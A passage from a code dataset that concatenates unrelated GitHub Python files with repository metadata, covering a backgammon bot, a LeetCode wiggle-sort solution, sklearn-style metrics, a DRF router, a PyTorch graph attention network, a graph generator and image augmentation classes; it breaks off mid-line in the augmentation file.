'company_documents': company_documents,\n 'company_name': company_name,\n }\n return HttpResponse(template.render(context, request))\n\ndef tryx(request):\n template = loader.get_template('insurance_app/try.html')\n return render(request, 'insurance_app/try.html')","repo_name":"strahovanie/django_insurance","sub_path":"insurance_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32815122182","text":"from .move_search_utils import search_possible_moves\nfrom .bot import Bot\nfrom copy import deepcopy\nfrom itertools import product\n\nclass BotBase(Bot):\n def __init__(self, player_color):\n self.player = player_color\n\n self.init_parameters()\n\n def init_parameters(self):\n self.depth = 1\n self.evaluation_functions = [(1, self.sum_dist)]\n\n def sum_dist(self, board, player):\n \"\"\" Sample evauluation function, the parameters are\n always the same. The function should return a value\n between 0 and 1 inclusively. 
\n 1 - position good for player\n 0 - position bad for player \"\"\"\n\n board.set_player_perspective(player)\n result = 0\n worst_dist_sum = 24 * 15\n\n for i in range(len(board.spikes)):\n if board.spikes[i][0] != 0 and \\\n board.spikes[i][1] == player:\n result += (24 - i) * board.spikes[i][0]\n \n return 1 - result / worst_dist_sum\n\n @staticmethod\n def opponent(player):\n opponents = {\n 'W' : 'B',\n 'B' : 'W'\n }\n return opponents[player]\n\n def board_value(self, board, player):\n weight_sum = sum([ev_fn[0] for ev_fn in\n self.evaluation_functions])\n return sum([fn[1](board, player) * fn[0] / weight_sum for fn in\n self.evaluation_functions]) \n\n def relative_board_value(self, board, player):\n # higher better\n return self.board_value(board, player) / \\\n self.board_value(board, BotBase.opponent(player))\n\n def make_moves(self, board, dice_results):\n moves_chosen = self.choose_moves(board, self.player,\n dice_results, self.depth)\n # TODO use the moves info to change the bot state\n\n # return the actual move from (score, moves) tuple\n return moves_chosen[1]\n\n def exec_move(self, board, move):\n if move[1] is not None:\n if move[1] == (-1):\n board.remove_checker_from_bar()\n board.push_player_checker(move[2] - 1)\n elif move[1] + move[2] < 24:\n board.move_checker(move[1] + move[2], move[1])\n else:\n board.pop_player_checker(move[1])\n return [move]\n else:\n return []\n\n\n def choose_moves(self, board, player, dice_results, depth):\n result_moves = []\n result_score = 0\n\n if len(dice_results) > 2:\n # dice are the same - the order does not matter\n board_copy = deepcopy(board)\n board_copy.set_player_perspective(player)\n\n for _ in range(4):\n move = self.choose_move(board_copy, player, dice_results[0], depth)\n result_moves += self.exec_move(board_copy, move)\n result_score = self.relative_board_value(board_copy, player)\n\n else:\n board_one, board_two = deepcopy(board), deepcopy(board)\n board_one_moves, board_two_moves = [], []\n board_one.set_player_perspective(player)\n board_two.set_player_perspective(player)\n \n move = self.choose_move(board_one, player, dice_results[0], depth)\n board_one_moves += self.exec_move(board_one, move)\n\n move = self.choose_move(board_one, player, dice_results[1], depth)\n board_one_moves += self.exec_move(board_one, move)\n\n # dice used in the reversed order\n move = self.choose_move(board_two, player, dice_results[1], depth)\n board_two_moves += self.exec_move(board_two, move)\n\n move = self.choose_move(board_two, player, dice_results[0], depth)\n board_two_moves += self.exec_move(board_two, move)\n\n board_one_val = self.relative_board_value(board_one, player)\n board_two_val = self.relative_board_value(board_two, player)\n if board_one_val > board_two_val:\n result_moves = board_one_moves\n result_score = board_one_val\n else:\n result_moves = board_two_moves\n result_score = board_two_val\n\n return (result_score, result_moves)\n\n def all_possible_dice_rolls(self):\n # TODO\n # should not be generated each time\n all_pairs = list(product(range(1,7), repeat=2))\n all_pairs = map(list, all_pairs)\n all_pairs = list(all_pairs)\n for i in range(len(all_pairs)):\n if all_pairs[i][0] == all_pairs[i][1]:\n all_pairs[i] = all_pairs[i] + all_pairs[i]\n return all_pairs\n\n def choose_move(self, board, player, dice_result, depth):\n possible_moves = search_possible_moves(board, player,\n dice_result)\n\n best_move, best_move_score = None, 0\n\n for possible_move in possible_moves:\n tmp_board = deepcopy(board)\n if 
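A hedged sketch of a second evaluation function obeying the contract described in the `sum_dist` docstring above (takes `(board, player)`, returns a value in [0, 1], higher is better). The `board.spikes` layout, `(checker_count, owner)` pairs, is inferred from `sum_dist`; the function itself is hypothetical:

```python
# Hypothetical extra evaluation function for BotBase; not part of the repo.
def blot_safety(self, board, player):
    board.set_player_perspective(player)
    # A "blot" is a spike holding exactly one checker, which can be hit.
    blots = sum(1 for spike in board.spikes
                if spike[0] == 1 and spike[1] == player)
    return 1. - blots / 24.  # at most 24 spikes, so the value stays in [0, 1]

# Registered with a weight; board_value() normalizes by the weight sum:
# self.evaluation_functions = [(3, self.sum_dist), (1, self.blot_safety)]
```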
possible_move == (-1):\n tmp_board.remove_checker_from_bar()\n tmp_board.push_player_checker(dice_result - 1)\n elif possible_move + dice_result < 24:\n tmp_board.move_checker(possible_move + dice_result,\n possible_move)\n else:\n tmp_board.pop_player_checker(possible_move)\n\n if depth > 0:\n all_possibilities = self.all_possible_dice_rolls()\n for dice_roll in all_possibilities:\n result, _ = self.choose_moves(tmp_board,\n BotBase.opponent(player), dice_roll, depth-1)\n if result > best_move_score:\n best_move_score = result\n best_move = possible_move\n else:\n result = self.relative_board_value(tmp_board, player)\n if result > best_move_score:\n best_move_score = result\n best_move = possible_move\n\n return (player, best_move, dice_result)\n\n\n\n","repo_name":"knight-erraunt/backgammon","sub_path":"backgammon/bots/bot_base.py","file_name":"bot_base.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18405620619","text":"import unittest\nfrom collections import deque\nfrom typing import List\ndef get_sol_obj(): return Solution()\nclass Solution:\n # https://leetcode.com/problems/wiggle-sort-ii/discuss/155764/Python-3-lines-simplest-solution-for-everyone-to-understand\n # bad solution\n # time O(n log n) space (n)\n def wiggleSort(self, nums: List[int]) -> None:\n n=len(nums)\n res = sorted(nums)\n i=n-1\n for idx in range(1,n,2):\n nums[idx]=res[i]\n i-=1\n i=0\n for idx in reversed(range(0,n,2)):\n nums[idx]=res[i]\n i+=1\nclass tester(unittest.TestCase):\n def test1(self):\n nums = [1,5,1,1,6,4]\n Output= [1,6,1,5,1,4]\n get_sol_obj().wiggleSort(nums)\n self.assertEqual(Output,nums)\n def test2(self):\n nums = [1,3,2,2,3,1]\n Output= [2,3,1,3,1,2]\n get_sol_obj().wiggleSort(nums)\n self.assertEqual(Output,nums)\n def test3(self):\n nums = [4,5,5,6]\n Output= [5,6,4,5]\n get_sol_obj().wiggleSort(nums)\n self.assertEqual(Output,nums)\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc324.py","file_name":"lc324.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73030771573","text":"import numpy as np\nfrom sklearn.metrics import precision_score\nfrom . 
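A quick hand-check of the two-pass fill in `wiggleSort` above, using the `Solution` class from that snippet:

```python
# For nums = [1, 5, 1, 1, 6, 4]: sorted -> [1, 1, 1, 4, 5, 6].
# Odd slots 1, 3, 5 take the largest values in descending order (6, 5, 4);
# even slots 4, 2, 0 take the smallest values (1, 1, 1), giving
# [1, 6, 1, 5, 1, 4], which satisfies nums[0] < nums[1] > nums[2] < ...
nums = [1, 5, 1, 1, 6, 4]
Solution().wiggleSort(nums)
assert all(nums[i] < nums[i + 1] if i % 2 == 0 else nums[i] > nums[i + 1]
           for i in range(len(nums) - 1))
```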
import validate\n\n\n@validate.proportion\ndef precision_at(y_true, y_score, proportion, ignore_nas=False):\n '''\n Calculates precision at a given proportion.\n Only supports binary classification.\n '''\n # Sort scores in descending order\n scores_sorted = np.sort(y_score)[::-1]\n\n # Based on the proportion, get the index to split the data\n # if value is negative, return 0\n cutoff_index = max(int(len(y_true) * proportion) - 1, 0)\n # Get the cutoff value\n cutoff_value = scores_sorted[cutoff_index]\n\n # Convert scores to binary, by comparing them with the cutoff value\n scores_binary = np.array([int(y >= cutoff_value) for y in y_score])\n # Calculate precision using sklearn function\n if ignore_nas:\n precision = __precision(y_true, scores_binary)\n else:\n precision = precision_score(y_true, scores_binary)\n\n return precision, cutoff_value\n\n\n@validate.proportion\ndef __threshold_at(y_score, proportion):\n # Sort scores in descending order\n scores_sorted = np.sort(y_score)[::-1]\n # Based on the proportion, get the index to split the data\n # if value is negative, return 0\n threshold_index = max(int(len(y_score) * proportion) - 1, 0)\n # Get the cutoff value\n threshold_value = scores_sorted[threshold_index]\n return threshold_value\n\n\n@validate.proportion\ndef __binarize_scores_at(y_score, proportion):\n threshold_value = __threshold_at(y_score, proportion)\n y_score_binary = np.array([int(y >= threshold_value) for y in y_score])\n return y_score_binary\n\n\ndef __precision(y_true, y_pred):\n '''\n Precision metric tolerant to unlabeled data in y_true,\n NA values are ignored for the precision calculation\n '''\n # make copies of the arrays to avoid modifying the original ones\n y_true = np.copy(y_true)\n y_pred = np.copy(y_pred)\n\n # precision = tp/(tp+fp)\n # True negatives do not affect precision value, so for every missing\n # value in y_true, replace it with 0 and also replace the value\n # in y_pred with 0\n is_nan = np.isnan(y_true)\n y_true[is_nan] = 0\n y_pred[is_nan] = 0\n precision = precision_score(y_true, y_pred)\n return precision\n\n\n@validate.proportion\ndef tp_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n tp = (y_pred == 1) & (y_true == 1)\n return tp.sum()\n\n\n@validate.proportion\ndef fp_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n fp = (y_pred == 1) & (y_true == 0)\n return fp.sum()\n\n\n@validate.proportion\ndef tn_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n tn = (y_pred == 0) & (y_true == 0)\n return tn.sum()\n\n\n@validate.proportion\ndef fn_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n fn = (y_pred == 0) & (y_true == 1)\n return fn.sum()\n\n\n@validate.proportion\ndef labels_at(y_true, y_score, proportion, normalize=False):\n '''\n Return the number of labels encountered in the top X proportion\n '''\n # Get indexes of scores sorted in descending order\n indexes = np.argsort(y_score)[::-1]\n\n # Sort true values in the same order\n y_true_sorted = y_true[indexes]\n\n # Grab top x proportion of true values\n cutoff_index = max(int(len(y_true_sorted) * proportion) - 1, 0)\n # add one to index to grab values including that index\n y_true_top = y_true_sorted[:cutoff_index+1]\n\n # Count the number of non-nas in the top x proportion\n # we are returning a count so it should be an int\n values = int((~np.isnan(y_true_top)).sum())\n\n if normalize:\n values = 
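A toy walk-through of `precision_at` above, with the intermediate values worked by hand (the import path is an assumption based on the repo layout):

```python
# from sklearn_evaluation.metrics import precision_at  # assumed import path
import numpy as np

y_true = np.array([1, 0, 1, 1, 0])
y_score = np.array([0.9, 0.8, 0.7, 0.2, 0.1])

# proportion=0.4 -> cutoff_index = max(int(5 * 0.4) - 1, 0) = 1
# sorted scores desc -> [0.9, 0.8, 0.7, 0.2, 0.1], so cutoff_value = 0.8
# scores >= 0.8 -> predictions [1, 1, 0, 0, 0]; tp = 1, fp = 1
precision, cutoff = precision_at(y_true, y_score, proportion=0.4)
assert cutoff == 0.8 and precision == 0.5  # 1 / (1 + 1)
```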
float(values)/(~np.isnan(y_true)).sum()\n\n return values\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/edublancas_sklearn-evaluation/sklearn-evaluation-master/sklearn_evaluation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"1645438511","text":"from rest_framework.routers import SimpleRouter, Route\n\n\nclass HypermediaRouter(SimpleRouter):\n routes = [\n Route(\n url=r'^{prefix}{trailing_slash}$',\n mapping={\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'post': 'process',\n 'delete': 'destroy',\n },\n name='{basename}',\n initkwargs={},\n ),\n Route(\n url=r'^{prefix}/{lookup}{trailing_slash}$',\n mapping={\n 'get': 'retrieve_model',\n 'put': 'update_model',\n 'patch': 'partial_update_model',\n 'post': 'process_model',\n 'delete': 'destroy_model',\n },\n name='{basename}',\n initkwargs={},\n ),\n ]\n","repo_name":"jcassee/registronavale","sub_path":"drf_hal/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"1799761032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nclass GAT(nn.Module):\n\n def __init__(self, input_size, output_size, K, dropout=0.6):\n super(GAT, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.K = K\n self.dropout = dropout\n\n \"\"\"\n Registering W and a as `Parameters` means that forward operations on them will be tracked\n so that a backwards (optimizing) pass can be derived. See the function `train()` at the\n bottom of this module for how easy pytorch makes this.\n \"\"\"\n self.W = nn.Parameter(torch.rand(K, output_size, input_size))\n self.a = nn.Parameter(torch.rand(K, 1, 2*output_size))\n\n def forward(self, X, adj):\n \"\"\"Expecting to be passed the entire graph in X.\"\"\"\n results = torch.empty(0, self.output_size * self.K)\n for i, x in enumerate(X):\n multi_head_results = torch.empty(1, 0)\n for k in range(self.K):\n one_head_result = F.elu(self.compute_embedding(X, i, k, adj))\n multi_head_results = torch.cat((multi_head_results, one_head_result), dim=1)\n results = torch.cat((results, multi_head_results), dim=0)\n return results\n\n def compute_embedding(self, X, i, k, adj):\n \"\"\"Compute the k'th embedding of the i'th node\"\"\"\n a = self.a[k]\n W = self.W[k]\n x = X[i]\n\n # Construct a matrix where each row is the mapped result of x and\n # one of its neighbours concated.\n neighbours = X[self.sample_neighborhood(i, adj)].view(-1, self.input_size)\n mapped_neighbours = neighbours.mm(W.t())\n mapped_x_repeat = x.view(1, -1).mm(W.t()).repeat(neighbours.shape[0], 1)\n neighbour_cat_x = torch.cat((mapped_x_repeat, mapped_neighbours), dim=1)\n\n # Compute the weights given to each of the neighbours based on\n # the attention function.\n attention = F.softmax(F.leaky_relu(neighbour_cat_x.mm(a.t())), dim=0)\n attention = F.dropout(attention, self.dropout, training=self.training)\n\n # Combine mapped neighbours based on attention weighting.\n return (mapped_neighbours.t().mm(attention)).t()\n\n def sample_neighborhood(self, i, adj):\n \"\"\"Currently return all neighbours\"\"\"\n return adj[i].coalesce().indices()\n\nclass GATFinal(GAT):\n def __init__(self, input_size, output_size, K):\n super(GATFinal, self).__init__(input_size, 
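A hypothetical registration against the `HypermediaRouter` above; the viewset, prefix, and method bodies are illustrative, not from this repo (and on older DRF versions the `basename` kwarg is spelled `base_name`):

```python
# Sketch only: the router maps GET on the bare prefix to `retrieve` (a
# singleton resource rather than a list) and POST to `process`; the
# `<lookup>` route dispatches to the *_model variants.
from rest_framework import viewsets

class ShipmentViewSet(viewsets.ViewSet):
    def retrieve(self, request):                 # GET  /shipment/
        ...
    def process(self, request):                  # POST /shipment/
        ...
    def retrieve_model(self, request, pk=None):  # GET  /shipment/<pk>/
        ...

router = HypermediaRouter()
router.register(r'shipment', ShipmentViewSet, basename='shipment')
urlpatterns = router.urls
```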
output_size, K)\n\n def forward(self, X, adj):\n \"\"\"\n Instead of concatenating the results, they should be averaged for predictions\n \"\"\"\n results = torch.empty(0, self.output_size)\n for i, x in enumerate(X):\n multi_head_results = torch.empty(1, 0)\n for k in range(self.K):\n one_head_result = self.compute_embedding(X, i, k, adj)\n multi_head_results = torch.cat((multi_head_results, one_head_result), dim=1)\n\n avg_results = (1/self.K) * sum(torch.chunk(multi_head_results.view(-1,), self.K))\n results = torch.cat((results, avg_results.view(1,self.output_size)), dim=0)\n\n return F.softmax(results, dim=1)\n\n\n# A simple function to train a net.\ndef train(net, X, y, lr=0.00000001, iters=100):\n optimizer = optim.SGD(net.parameters(), lr=lr)\n criterion = nn.MSELoss()\n for i in range(iters):\n optimizer.zero_grad()\n output = net.forward(X)\n loss = criterion(output, y)\n print(loss)\n loss.backward()\n optimizer.step()\n","repo_name":"agpar/reddit_rep2","sub_path":"machine_learning/archive/gat.py","file_name":"gat.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30002323593","text":"import sys\nimport random\n\ndef gerar_arestas_aleatorias(num_vertices, num_arestas, cap_minima, cap_maxima):\n aleatorios = set()\n\n dict_arestas = {}\n while(num_arestas > 0):\n res = random.sample(range(0, num_vertices), 2)\n peso = random.randint(cap_minima, cap_maxima)\n key = (res[0], res[1], peso)\n invert_key = (res[1], res[0], peso)\n if (key not in dict_arestas and invert_key not in dict_arestas):\n dict_arestas[key] = peso\n aresta = (res[0], res[1], peso)\n aleatorios.add(aresta)\n num_arestas -= 1\n \n return aleatorios\n\n\nif __name__ == \"__main__\":\n if (len(sys.argv) < 6):\n print(\"Arquivo saida, numero de vertices, numero de arestas necessarios, capacidade minima, capacidade maxima\")\n exit(0)\n \n nome_arquivo = sys.argv[1]\n num_vertices = int(sys.argv[2])\n num_arestas = int(sys.argv[3])\n capacidade_minima = int(sys.argv[4])\n capacidade_maxima = int(sys.argv[5])\n\n arestas = gerar_arestas_aleatorias(\n num_vertices, num_arestas, \n capacidade_minima, capacidade_maxima\n )\n\n s = str(random.randint(0, num_vertices-1))\n t = str(random.randint(0, num_vertices-1))\n while (s == t):\n t = str(random.randint(0, num_vertices-1))\n\n texto = \"\"\n texto += str(num_vertices)\n texto += '\\n'\n texto += str(s)\n texto += \" \"\n texto += str(t)\n texto += \" \"\n texto += str(len(arestas))\n texto += \"\\n\"\n\n for v1, v2, peso in arestas:\n texto += str(v1) \n texto += \" \" \n texto += str(v2) \n texto += \" \" \n texto += str(peso) \n texto += \"\\n\"\n\n texto += \"0\"\n\n with open(nome_arquivo, \"w\") as saida:\n saida.write(texto)","repo_name":"thuzax/ED-2020","sub_path":"listas-de-exercicios/lista-8/gerador.py","file_name":"gerador.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11772656362","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Donny You (youansheng@gmail.com)\n# Image Augmentations implemented by PIL.Image. 
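A standalone numeric sketch of the attention step inside `compute_embedding` above, with toy dimensions (the shapes mirror the class; nothing else is taken from it):

```python
import torch
import torch.nn.functional as F

in_dim, out_dim, n_neigh = 4, 3, 5
W = torch.rand(out_dim, in_dim)           # one head's weight matrix
a = torch.rand(1, 2 * out_dim)            # one head's attention vector
x = torch.rand(in_dim)                    # centre node features
neighbours = torch.rand(n_neigh, in_dim)  # sampled neighbourhood

mapped_neigh = neighbours.mm(W.t())                        # (n_neigh, out_dim)
mapped_x = x.view(1, -1).mm(W.t()).repeat(n_neigh, 1)      # (n_neigh, out_dim)
cat = torch.cat((mapped_x, mapped_neigh), dim=1)           # (n_neigh, 2*out_dim)

attention = F.softmax(F.leaky_relu(cat.mm(a.t())), dim=0)  # (n_neigh, 1), sums to 1
embedding = mapped_neigh.t().mm(attention).t()             # (1, out_dim)
```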
Including RandomPad, RandomRotate, RandomResize etc.\n\n\nimport collections\nimport random\nimport math\nimport cv2\nimport matplotlib\nimport numpy as np\nfrom PIL import Image, ImageFilter, ImageOps\n\n\nclass RandomPad(object):\n \"\"\"Random Pad a ``PIL.Image``\n\n Args:\n inputs: All elements that need to be processed.\n up_scale_range: (list): the padding scale range of the image.\n mean: (list): the mean pixel value.\n ratio: the ratio of random pad.\n\n Returns:\n Outputs: All elements that have been processed.\n \"\"\"\n def __init__(self, up_scale_range=None, ratio=0.5, mean=(104, 117, 123)):\n assert isinstance(up_scale_range, (list, tuple))\n self.up_scale_range = up_scale_range\n self.ratio = ratio\n self.mean = tuple(mean)\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n ws = random.uniform(self.up_scale_range[0], self.up_scale_range[1])\n hs = ws\n for _ in range(50):\n scale = random.uniform(self.up_scale_range[0], self.up_scale_range[1])\n min_ratio = max(0.5, 1. / scale / scale)\n max_ratio = min(2, scale * scale)\n ratio = math.sqrt(random.uniform(min_ratio, max_ratio))\n ws = scale * ratio\n hs = scale / ratio\n if ws >= 1 and hs >= 1:\n break\n\n pad_width = random.randint(0, int(ws * width) - width)\n pad_height = random.randint(0, int(hs * height) - height)\n left_pad = random.randint(0, pad_width)\n up_pad = random.randint(0, pad_height)\n right_pad = pad_width - left_pad\n down_pad = pad_height - up_pad\n if not isinstance(img, list):\n img = ImageOps.expand(img, (left_pad, up_pad, right_pad, down_pad), fill=self.mean)\n else:\n img = [ImageOps.expand(item, (left_pad, up_pad, right_pad, down_pad), fill=self.mean) for item in img]\n\n if labelmap is not None:\n labelmap = ImageOps.expand(labelmap, (left_pad, up_pad, right_pad, down_pad), fill=255)\n\n if maskmap is not None:\n maskmap = ImageOps.expand(maskmap, (left_pad, up_pad, right_pad, down_pad), fill=1)\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] += left_pad\n polygons[object_id][polygon_id][1::2] += up_pad\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] += left_pad\n kpts[:, :, 1] += up_pad\n\n if bboxes is not None and bboxes.size > 0:\n bboxes[:, 0::2] += left_pad\n bboxes[:, 1::2] += up_pad\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomBorder(object):\n \"\"\" Padding the Image to proper size.\n Args:\n stride: the stride of the network.\n pad_value: the value that pad to the image border.\n img: Image object as input.\n Returns::\n img: Image object.\n \"\"\"\n def __init__(self, pad=None, ratio=0.5, mean=(104, 117, 123), allow_outside_center=True):\n self.pad = pad\n self.ratio = ratio\n self.mean = tuple(mean)\n self.allow_outside_center = allow_outside_center\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n 
if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n left_pad, up_pad, right_pad, down_pad = self.pad\n target_size = [width + left_pad + right_pad, height + up_pad + down_pad]\n offset_left = -left_pad\n offset_up = -up_pad\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] -= offset_left\n kpts[:, :, 1] -= offset_up\n mask = np.logical_or.reduce((kpts[:, :, 0] >= target_size[0], kpts[:, :, 0] < 0,\n kpts[:, :, 1] >= target_size[1], kpts[:, :, 1] < 0))\n kpts[mask == 1, 2] = -1\n\n if bboxes is not None and bboxes.size > 0:\n if self.allow_outside_center:\n mask = np.ones(bboxes.shape[0], dtype=bool)\n else:\n crop_bb = np.array([offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]])\n center = (bboxes[:, :2] + bboxes[:, 2:]) / 2\n mask = np.logical_and(crop_bb[:2] <= center, center < crop_bb[2:]).all(axis=1)\n\n bboxes[:, 0::2] -= offset_left\n bboxes[:, 1::2] -= offset_up\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, target_size[0] - 1)\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, target_size[1] - 1)\n\n mask = np.logical_and(mask, (bboxes[:, :2] < bboxes[:, 2:]).all(axis=1))\n bboxes = bboxes[mask]\n if labels is not None:\n labels = labels[mask]\n\n if polygons is not None:\n new_polygons = list()\n for object_id in range(len(polygons)):\n if mask[object_id] == 1:\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] -= offset_left\n polygons[object_id][polygon_id][1::2] -= offset_up\n polygons[object_id][polygon_id][0::2] = np.clip(polygons[object_id][polygon_id][0::2],\n 0, target_size[0] - 1)\n polygons[object_id][polygon_id][1::2] = np.clip(polygons[object_id][polygon_id][1::2],\n 0, target_size[1] - 1)\n\n new_polygons.append(polygons[object_id])\n\n polygons = new_polygons\n\n if not isinstance(img, list):\n img = ImageOps.expand(img, border=tuple(self.pad), fill=tuple(self.mean))\n else:\n img = [ImageOps.expand(item, border=tuple(self.pad), fill=tuple(self.mean)) for item in img]\n\n if maskmap is not None:\n maskmap = ImageOps.expand(maskmap, border=tuple(self.pad), fill=1)\n\n if labelmap is not None:\n labelmap = ImageOps.expand(labelmap, border=tuple(self.pad), fill=255)\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomHFlip(object):\n def __init__(self, swap_pair=None, ratio=0.5):\n self.swap_pair = swap_pair\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n if not isinstance(img, list):\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n else:\n img = [item.transpose(Image.FLIP_LEFT_RIGHT) for item in img]\n\n if labelmap is not None:\n labelmap = labelmap.transpose(Image.FLIP_LEFT_RIGHT)\n labelmap_mode = labelmap.mode\n labelmap = np.asarray(labelmap)\n for pair in self.swap_pair:\n a_mask = (labelmap == pair[0])\n labelmap[labelmap == pair[1]] = pair[0]\n labelmap[a_mask] = pair[1]\n\n labelmap = Image.fromarray(labelmap, mode=labelmap_mode)\n\n if maskmap is not None:\n maskmap = 
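A self-contained numpy illustration of the bounding-box bookkeeping that `RandomBorder` (and the crop classes later in this file) perform: shift into the new coordinate frame, clip to the target size, then drop boxes that collapsed; the numbers are made up:

```python
import numpy as np

bboxes = np.array([[10., 10., 50., 40.],
                   [90., 90., 120., 110.]])
offset_left, offset_up = 30, 20   # origin of the new frame in old coordinates
target_size = (60, 60)            # (width, height) of the result

bboxes[:, 0::2] -= offset_left
bboxes[:, 1::2] -= offset_up
bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, target_size[0] - 1)
bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, target_size[1] - 1)

keep = (bboxes[:, :2] < bboxes[:, 2:]).all(axis=1)
# Only the first box survives; the second clips down to a single point.
print(bboxes[keep])   # [[ 0.  0. 20. 20.]]
```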
maskmap.transpose(Image.FLIP_LEFT_RIGHT)\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] = width - 1 - polygons[object_id][polygon_id][0::2]\n\n if bboxes is not None and bboxes.size > 0:\n xmin = width - 1 - bboxes[:, 2]\n xmax = width - 1 - bboxes[:, 0]\n bboxes[:, 0] = xmin\n bboxes[:, 2] = xmax\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] = width - 1 - kpts[:, :, 0]\n\n for pair in self.swap_pair:\n temp_point = np.copy(kpts[:, pair[0] - 1])\n kpts[:, pair[0] - 1] = kpts[:, pair[1] - 1]\n kpts[:, pair[1] - 1] = temp_point\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomSaturation(object):\n def __init__(self, lower=0.5, upper=1.5, ratio=0.5):\n self.lower = lower\n self.upper = upper\n self.ratio = ratio\n assert self.upper >= self.lower, \"saturation upper must be >= lower.\"\n assert self.lower >= 0, \"saturation lower must be non-negative.\"\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n img = np.asarray(img).astype(np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img[:, :, 1] *= random.uniform(self.lower, self.upper)\n img = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomHue(object):\n def __init__(self, delta=18, ratio=0.5):\n assert 0 <= delta <= 360\n self.delta = delta\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n img = np.asarray(img).astype(np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img[:, :, 0] += random.uniform(-self.delta, self.delta)\n img[:, :, 0][img[:, :, 0] > 360] -= 360\n img[:, :, 0][img[:, :, 0] < 0] += 360\n img = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomPerm(object):\n def __init__(self, ratio=0.5):\n self.ratio = ratio\n self.perms = ((0, 1, 2), (0, 2, 1),\n (1, 0, 2), (1, 2, 0),\n (2, 